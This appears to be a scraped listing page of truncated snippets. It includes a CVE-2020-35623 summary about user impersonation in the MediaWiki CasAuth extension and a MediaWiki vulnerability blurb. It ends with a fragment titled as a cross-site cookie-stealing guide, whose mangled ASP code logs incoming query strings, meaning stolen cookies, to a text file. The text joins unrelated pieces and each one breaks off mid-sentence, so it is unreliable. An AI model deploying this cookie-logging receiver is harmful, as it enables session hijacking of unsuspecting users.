CVE-2020-35623

An issue was discovered in the CasAuth extension for MediaWiki through 1.35.1. Due to improper username validation, it allowed user impersonation with trivial manipulations of certain characters within a given username. An ordinary user may be able to login as a "bureaucrat user" who has a simila...

MediaWiki 安全漏洞

MediaWiki is a set of free and freely available web-based Wiki engines from the MediaWiki Wikimedia Foundation in the United States. It can be used to deploy in-house knowledge management and content management systems. A security vulnerability exists in MediaWiki version 1.35.1 and prior version...

Cross-site attacks-steal cookies-vulnerability warning-the black bar safety net

% msg=Request. ServerVariables"QUERYSTRING" testfile=Server. MapPath"cook.txt" set fs=server. CreateObject"scripting. filesystemobject" set thisfile=fs. OpenTextFiletestfile,8,True,0 thisfile. Writeline""&msg& "" thisfile. close set fs = nothing % scriptwindow...